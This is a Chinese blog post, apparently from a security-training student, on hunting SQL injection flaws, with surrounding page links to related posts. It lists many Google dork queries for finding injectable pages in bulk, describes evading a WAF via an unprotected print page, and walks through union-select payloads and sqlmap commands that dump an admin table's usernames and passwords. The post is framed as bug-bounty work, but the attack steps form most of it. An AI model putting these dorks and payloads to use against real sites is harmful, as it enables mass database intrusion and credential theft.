实战纪实 | 实战sql漏洞挖掘技巧

最新推荐文章于 2024-01-03 14:31:26 发布
最新推荐文章于 2024-01-03 14:31:26 发布
阅读量1.5k 收藏 33
点赞数 4
分类专栏: 实纪实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/113759239
版权 
更多黑客技能 公众号:暗网黑客

作者:掌控安全学员-黑影

信息收集

首先要知道挖漏洞是一个很玄学的事情,为什么呢我也不知道图片…

这里先给大家推荐几个谷歌hack语法用来批量挖掘sql漏洞的。

inurl:/search_results.php search=
inurl:’Product.asp?BigClassName
inurl:Article_Print.asp?
inurl:NewsInfo.asp?id=
inurl:EnCompHonorBig.asp?id=
inurl:NewsInfo.asp?id=
inurl:ManageLogin.asp
inurl:Offer.php?idf=
inurl:Opinions.php?id=
inurl:Page.php?id=
inurl:Pop.php?id=
inurl:Post.php?id=
inurl:Prod_info.php?id=
inurl:Product-item.php?id=
inurl:Product.php?id=
inurl:Product_ranges_view.php?ID=
inurl:Productdetail.php?id=
inurl:Productinfo.php?id=
inurl:Produit.php?id=
inurl:Profile_view.php?id=
inurl:Publications.php?id=
inurl:Stray-Questions-View.php?num=
inurl:aboutbook.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:article.php?ID=
inurl:asp?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:event.php?id=
inurl:faq2.php?id=
inurl:fellows.php?id=
inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=

挖掘

当我们满怀信息的去挖掘漏洞时你会发现我的天有waf,不挖了太难了
首先我们不要有这样的想法我们要想我们能挖到!!!

好了回归正题!!

当你发现网站有waf怎么绕都绕不过去不要急,影哥教你骚操作好好看好好学,既然网站有waf,我们也绕不过去,那我们就找网站没有waf的地方。
图片

你看看这地方注意这四个字“打印此文”没错这里没有waf没有保护
and 1=2 没有返回信息说明为假,
在这里插入图片描述

and 1=1返回了数据说明为真不错
图片

猜字段order by 29没有返回信息
图片

order by 28返回了信息也就是说字段在1-28
图片

然后我们猜想一下有个表是admin表,union select 1,2,3,4,5,6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 数据库没有出错说明数据库当中的确有admin表的存在并且,

发现注入点在3,4,5,14

然后我们尝试猜测最常见的管理表字段名username和password,

我们在3,4,5,14中任选两个,分别填入username和password

图片

union select 1,2,username,4,password,6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 可以看出页面已经返回了admin表中的username和password的字段内容在这里插入图片描述

不错不错

再给各位演示一下用sqlmap

首先sqlmap是自带脚本的,可以绕waf的这些脚本都在tamper文件夹中,详细就不讲了大家可以上网搜搜嘻嘻

sqlmap.py -u www.xxxx.com/Article_Print.asp?ArticleID=1182 —level 3 (level是等级最高是5级)
图片

sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 —dbs

咦!这是怎么回事,怎么跑不出来数据库库名算了放弃,没错这就是我当初第一次使用sqlmap的状态,明明跑出了漏洞但数据库库名跑不出嘤嘤

当你仔细看你就会发现sqlmap给你提示了。。。。。。。

好家伙瞬间想到一句话爷只是怕错过。。。。。。
图片

好家伙我直接泪奔。。
sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 —tables
图片

看看看看跑出来了
sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 -T admin —columns获取admin表里的字段(-T 是tables简写)
图片

sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 -T admin -C username,password —dump获取admin表里的username和password字段内容(-T是tables简写 -C是columns简写)
图片

哇哦是不是很nice点赞!!

最后说一下当你的漏洞被忽略的时候一定要看他给的原因

当你的忽略原因和我一样是无法复现时

在这里插入图片描述
在这里插入图片描述

一定要自己在复现一次看看是不是真的不能复现如果能那就申诉(毕竟被扣了27积分呜呜)

好在最后申诉成功了,要不然我的27积分就白白没了,

黑客渗透视频教程,扫码免费领

在这里插入图片描述

zkzq
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
.Net_调用SAP_RFC接口来读取数据实战纪实.docx
06-14
.Net_调用SAP_RFC接口来读取数据实战纪实.docx
常用谷歌语法
qq_36232967的博客
05-25 352
这里先给大家推荐几个谷歌hack语法用来批量挖掘sql漏洞的。 inurl:/search_results.php search= inurl:’Product.asp?BigClassName inurl:Article_Print.asp? inurl:NewsInfo.asp?id= inurl:EnCompHonorBig.asp?id= inurl:NewsInfo.asp?id= inurl:ManageLogin.asp inurl:Offer.php?idf= inurl:Opinions
从零开始学习软件漏洞挖掘系列教程
04-13
从零开始学习软件漏洞挖掘系列教程
.Net调用SAPRFC接口来读取数据实战纪实[汇编].pdf
10-10
.Net调用SAPRFC接口来读取数据实战纪实[汇编].pdf
食品公司信息化纪实资料文件
06-08
食品公司信息化纪实
中间件漏洞详解
10-26
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
超级干货!SRC漏洞挖掘项目实战经验分享
m0_71744960的博客
06-10 3470
SRC漏洞挖掘是指通过对软件和系统进行安全测试和分析,发现和利用SRC漏洞的过程。SRC漏洞通常是由于软件设计、实现或配置中的错误或缺陷导致的,这些错误或缺陷可能会被黑客利用来攻击系统,造成数据泄露、系统崩溃、加密货币盗窃等安全问题。
逻辑漏洞挖掘(个人经验总结)
Azjj
05-04 6478
因为最近接触的逻辑漏洞挺多的,所以想把自己的个人经验总结一下。因为逻辑漏洞是那些扫描器扫不出来的,所以挖起来会比较轻松,像那些注入基本都被挖空了
实战SRC漏洞挖掘全过程,流程详细【网络安全】
2301_76694151的博客
05-06 1734
一句话,柿子要挑软的捏。渗透测试思路最重要,每个人在做渗透测试时的思路都不同,有思路有想法才能进行下去。
信息泄露漏洞挖掘技巧20200429.docx
04-29
总计信息泄露漏洞的挖掘、利用、修补方式,主要包括.svn源代码泄露.git源代码泄露、httpsys漏洞检测以及利用方式,常见中间件的后台登录页面以及默认用户名密码。用于挖掘常见信息泄露漏洞,仅供学习使用
PHP漏洞挖掘
10-21
20条途径挖掘PHP漏洞,请各位看看。大概有用吧
拨开云雾现真容 SQL语句显神通——宜春市应用计算机开展住房公积金审计纪实.pdf
09-19
拨开云雾现真容 SQL语句显神通——宜春市应用计算机开展住房公积金审计纪实.pdf
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
七年IT奋斗纪实及感悟
03-02
北京火龙果软件工程技术中心 这些日子我一直在写一个实时操作系统内核,已有小成了,等写完我会全部公开,希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有方向,所以把我的经历...
sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)
hackzkaq的博客
12-23 3602
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
SRC中的一些信息收集姿势
最新发布
hackzkaq的博客
01-03 1140
前前后后挖了四个月的EDUSRC,顺利从路人甲升到了网络安全专家,从提交的内容来看大部分还是以中低危为主,主打的就是弱口令和未授权。在这过程中还是比较浮躁的,因此接下来的时间还是要好好沉淀一下自身的技术,学习如何提升危害到高危。下面是常用的一些信息收集思路(不做任何漏洞分享,思路为主)当然收集的姿势肯定还是有的,网络安全的未来就靠你们了申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.没看够~?欢迎关注!
OSCP系列靶场-Esay-Ha-natraj
hackzkaq的博客
01-02 855
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo级别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
ps -ef | grep nginx 解释下这个命令
08-10
这个命令的意思是列出当前系统中所有正在运行的进程,并通过管道传递给grep命令,查找其中包含关键字"nginx"的进程。 grep命令的-v选项用于去除包含关键字"grep"的进程,避免把grep命令本身作为结果。最后输出的是该进程的相关信息,包括进程号(PID)等。这个命令可以用于查找和筛选与nginx相关的进程。123 #### 引用[.reference_title] - *1* *3* [实用 ps -ef | grep php-fpm | grep -v grep | cut -c 9-15 | xargs kill -s 9](https://blog.csdn.net/tjls2008/article/details/120879808)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *2* [ps -ef | grep -v grep 踩坑(纪实)](https://blog.csdn.net/qq_31475993/article/details/125660242)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值